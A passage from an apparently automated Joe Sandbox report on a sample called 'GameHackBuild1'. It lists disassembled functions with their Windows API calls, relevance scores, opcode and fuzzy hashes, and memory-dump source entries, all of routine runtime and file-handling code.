                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2655393344-3849766595
                                      • Opcode ID: 19e7a2d0e0bbef027cdc4707dc9d607eff629b4c8ff700a298fc78db95691ce6
                                      • Instruction ID: 214ea097baa883b15e23eacb6ea4056c2bfec9dcc50d4a7a4683e647d3bd5ddc
                                      • Opcode Fuzzy Hash: 19e7a2d0e0bbef027cdc4707dc9d607eff629b4c8ff700a298fc78db95691ce6
                                      • Instruction Fuzzy Hash: 5101DBB52443057FD6249F54FD41FA67398EB41715F10053DFA4696181CEF168C19664
                                      Function 00A09F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00A0CC94,00000001,?,?,?,00000000,00A14ECD,?,?,?), ref: 00A09F4C
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00A14ECD,?,?,?,?,?,00A14972,?), ref: 00A09F8E
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00A0CC94,00000001,?,?), ref: 00A09FB8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: 10c85c067c13c17009ad961a23d614f8f32a222abd25c12fec2f271bed1c55f8
                                      • Instruction ID: 25d7c6e49fbb6bffa6999f12a476a96f3576a043cd64b88b3166e2fd68d32254
                                      • Opcode Fuzzy Hash: 10c85c067c13c17009ad961a23d614f8f32a222abd25c12fec2f271bed1c55f8
                                      • Instruction Fuzzy Hash: 5531057160830A9BDF148F14EE48B6BBBA8EB90710F04461CF945DB1C2C775DD49CBA2
                                      Function 00A0A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A22E
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A261
                                      • GetLastError.KERNEL32(?,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A27E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast
                                      • String ID:
                                      • API String ID: 2485089472-0
                                      • Opcode ID: 957dc59406c0da72c948c751a3e29aaa97f605f402e0770a1ffd4ad8e59caab3
                                      • Instruction ID: 52a2e419de6535defaf63ab0b90555f06dcda92353ae0039c31e3f8cfc933148
                                      • Opcode Fuzzy Hash: 957dc59406c0da72c948c751a3e29aaa97f605f402e0770a1ffd4ad8e59caab3
                                      • Instruction Fuzzy Hash: BF01DE3254031C66DF32ABA46D46BEE7358AF2F781F044461F901DA0E1CB66CA8186B3
                                      Function 00A2AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A2B019
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: a8d51596b705aadeb7e0b5c4a88c36c90f3ad5d7989b10f360180f12c5b29d47
                                      • Instruction ID: 13ac4f04e5aa71d21e4c639c1e98ad5b49bea67b48bcbfd0cf4acf9d1ff3e654
                                      • Opcode Fuzzy Hash: a8d51596b705aadeb7e0b5c4a88c36c90f3ad5d7989b10f360180f12c5b29d47
                                      • Instruction Fuzzy Hash: EE4125B050826C9BDF228B289C94AE6BBB9EB05304F1405FCE59A87142D335AA55CF30
                                      Function 00A2A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,000000FF), ref: 00A2A79D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: a8d6cb8055dc1377fb0738052def5dfb748c5979012fdc8cf20c7ddf32e1d93f
                                      • Instruction ID: 46b72ff1c3233fb273e061679d3376a67ba12ec37d3e49055febcb167e13e71e
                                      • Opcode Fuzzy Hash: a8d6cb8055dc1377fb0738052def5dfb748c5979012fdc8cf20c7ddf32e1d93f
                                      • Instruction Fuzzy Hash: 1201257250421CBBCF12AFA4ED02DEE3FA6FF28710F004564FE1466160CA768931EB91
                                      Function 00A2A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A29D2F), ref: 00A2A715
                                      Strings
                                      • InitializeCriticalSectionEx, xrefs: 00A2A6E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 78fabd00e15ed10a6e1d5c68539f483ce1e7dbf8f72a930ec24aa947ffa65422
                                      • Instruction ID: 6736695ffba2fd3081b7a0019ad882fa85b261fc5d4085771758450c91fbecd2
                                      • Opcode Fuzzy Hash: 78fabd00e15ed10a6e1d5c68539f483ce1e7dbf8f72a930ec24aa947ffa65422
                                      • Instruction Fuzzy Hash: 60F0BE3164521CBBCF11AFA8DC06CAE7FA1FF24720F004564FC095A260DB718A11EB91
                                      Function 00A2A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: 83beab43f9567c0b79b74de69742332fc354087bf05665b5e5831308c682ae0a
                                      • Instruction ID: cb80cf8a0f398e0baa515df8f26875ab265e1f992d253773fa2e93d5c93cce16
                                      • Opcode Fuzzy Hash: 83beab43f9567c0b79b74de69742332fc354087bf05665b5e5831308c682ae0a
                                      • Instruction Fuzzy Hash: 3BE0E571B4922C7B9624EBA8AC069EEBBA5EB35710F410565FC055B240DE704E01A6D6
                                      Function 00A2329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00A232AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 2ea0f46fb3edbbf2caa18647a772f2007d3fb4688742404b8d64468205626c79
                                      • Instruction ID: df2d41d916fc31e0d7a389db01cb230e496e54b146e580c79fd662fcc7e5eefa
                                      • Opcode Fuzzy Hash: 2ea0f46fb3edbbf2caa18647a772f2007d3fb4688742404b8d64468205626c79
                                      • Instruction Fuzzy Hash: B4D02B23B807347B8D1433EC7C039FE7E449702FB5F490A62FE081A1428765455002C5
                                      Function 00A2B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A2B1A5,?), ref: 00A2AF46
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A2B1EA,?,00000000), ref: 00A2B3C4
                                      • GetCPInfo.KERNEL32(00000000,00A2B1EA,?,?,?,00A2B1EA,?,00000000), ref: 00A2B3D7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: 6aaf8c443bf8cc93a39dc0bc20d95986bfbae8caf7a5d09263852d32361cf1fd
                                      • Instruction ID: 12528e20a37d03badb1ea559e4614219aafac697dcf6066c816cfdb5f859efb4
                                      • Opcode Fuzzy Hash: 6aaf8c443bf8cc93a39dc0bc20d95986bfbae8caf7a5d09263852d32361cf1fd
                                      • Instruction Fuzzy Hash: EC513670D102259FDB24EF79E8C16BABBF5EF51310F18407EE0968B292D7359542CBA0
                                      Function 00A01385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A06057: __EH_prolog.LIBCMT ref: 00A0605C
                                        • Part of subcall function 00A0C827: __EH_prolog.LIBCMT ref: 00A0C82C
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C86F
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C893
                                      • new.LIBCMT ref: 00A013FE
                                        • Part of subcall function 00A0B07D: __EH_prolog.LIBCMT ref: 00A0B082
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 9cd748dbc47ef157b9faa089d527a42cd4319fdcf5de2e4c2193bbe0604b7979
                                      • Instruction ID: e1ae29847800a2ceb2a50e35dfe01310fbbf3ad1c8a0158efd34b57103f87a35
                                      • Opcode Fuzzy Hash: 9cd748dbc47ef157b9faa089d527a42cd4319fdcf5de2e4c2193bbe0604b7979
                                      • Instruction Fuzzy Hash: 884134B0805B449EE724DF7989859E7FBE5FF18300F404A2ED6EE83282DB326554CB11
                                      Function 00A01380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A06057: __EH_prolog.LIBCMT ref: 00A0605C
                                        • Part of subcall function 00A0C827: __EH_prolog.LIBCMT ref: 00A0C82C
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C86F
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C893
                                      • new.LIBCMT ref: 00A013FE
                                        • Part of subcall function 00A0B07D: __EH_prolog.LIBCMT ref: 00A0B082
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: f9ace9bcb0fc48631f61a199bab80a7ce3d7190df4ab72fb8bd3a1935f28f935
                                      • Instruction ID: 8d4f2383f17a26bfd3a87a643389d4f9bb6f9847f8b1e8ca702de21d5680fb2f
                                      • Opcode Fuzzy Hash: f9ace9bcb0fc48631f61a199bab80a7ce3d7190df4ab72fb8bd3a1935f28f935
                                      • Instruction Fuzzy Hash: 424123B0805B449EE724DF798985AE7FBE5FF18300F504A2ED5EE83282DB326554CB11
                                      Function 00A2B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A28FA5: GetLastError.KERNEL32(?,00A40F50,00A23E14,00A40F50,?,?,00A2388F,?,?,00A40F50), ref: 00A28FA9
                                        • Part of subcall function 00A28FA5: _free.LIBCMT ref: 00A28FDC
                                        • Part of subcall function 00A28FA5: SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A2901D
                                        • Part of subcall function 00A28FA5: _abort.LIBCMT ref: 00A29023
                                        • Part of subcall function 00A2B2AE: _abort.LIBCMT ref: 00A2B2E0
                                        • Part of subcall function 00A2B2AE: _free.LIBCMT ref: 00A2B314
                                        • Part of subcall function 00A2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A2B1A5,?), ref: 00A2AF46
                                      • _free.LIBCMT ref: 00A2B200
                                      • _free.LIBCMT ref: 00A2B236
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID:
                                      • API String ID: 2991157371-0
                                      • Opcode ID: f312991ec7c073363de766012c092ab5283ef866b83994147a555cddb15495ed
                                      • Instruction ID: 0cbde7c79f2b6eef8ca7984d10c532671340fd470090a179c8a01d938cdfb617
                                      • Opcode Fuzzy Hash: f312991ec7c073363de766012c092ab5283ef866b83994147a555cddb15495ed
                                      • Instruction Fuzzy Hash: DA31D131900228EFDB10EFADE941BADB7E1EF40320F2541B9F4149B291EB759D41CB60
                                      Function 00A0971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A09EDC,?,?,00A07867), ref: 00A097A6
                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A09EDC,?,?,00A07867), ref: 00A097DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: b5c7b9d27e8f029e794efc759c4853d8515b2c6366efc39a9b8976350698640e
                                      • Instruction ID: d10bbac5e9246a49af27f27e8e8944ba14363c4748ceab4dfbca68f25036e942
                                      • Opcode Fuzzy Hash: b5c7b9d27e8f029e794efc759c4853d8515b2c6366efc39a9b8976350698640e
                                      • Instruction Fuzzy Hash: 002137B201474CAFE7308F64EC85BA7B7E8EB49764F00492DF5E5821D2C374AC858B21
                                      Function 00A09D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A07547,?,?,?,?), ref: 00A09D7C
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A09E2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: ef493f2144099f63030ff26e0fd24a27c33ea1215ac1e63ac9a41eb1e4353697
                                      • Instruction ID: 9d67a133bda2562ec4552041cc765189c5fc52d932c5235dac4dce9c7b909a10
                                      • Opcode Fuzzy Hash: ef493f2144099f63030ff26e0fd24a27c33ea1215ac1e63ac9a41eb1e4353697
                                      • Instruction Fuzzy Hash: 1C21E73118824AABC714DF24D851EABBBE4AF96708F04081DF4D1C7182D329DE4CDB51
                                      Function 00A2A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00A2A4B8
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A2A4C5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: a4e7be2457b060c3867a3cfa7b31a185e65518b5009c7355c750feaa6dbbd89c
                                      • Instruction ID: 7f0b19c3159916c068b1f656e97a914a9410070f3ed27611c2a05ecc33a7af61
                                      • Opcode Fuzzy Hash: a4e7be2457b060c3867a3cfa7b31a185e65518b5009c7355c750feaa6dbbd89c
                                      • Instruction Fuzzy Hash: 91110A33A016319F9F25EF6CFC4589A73A5AB903207164230FD15EB244DB70DC42C6D2
                                      Function 00A09B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00A09B35,?,?,00000000,?,?,00A08D9C,?), ref: 00A09BC0
                                      • GetLastError.KERNEL32 ref: 00A09BCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: b692da39d34d8f36c60c751237baa59f33237e2b846b38a8cbfa9b7a9d0e72c0
                                      • Instruction ID: 51081392337a917c0245bc5f5a5d4ba6c54ecedd6354fa48e1a3e4104f008153
                                      • Opcode Fuzzy Hash: b692da39d34d8f36c60c751237baa59f33237e2b846b38a8cbfa9b7a9d0e72c0
                                      • Instruction Fuzzy Hash: F401C43230921D9BCB08CF65BD949BFB3A9AFC6731B14852DF916872D2DA31D8059A21
                                      Function 00A09E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
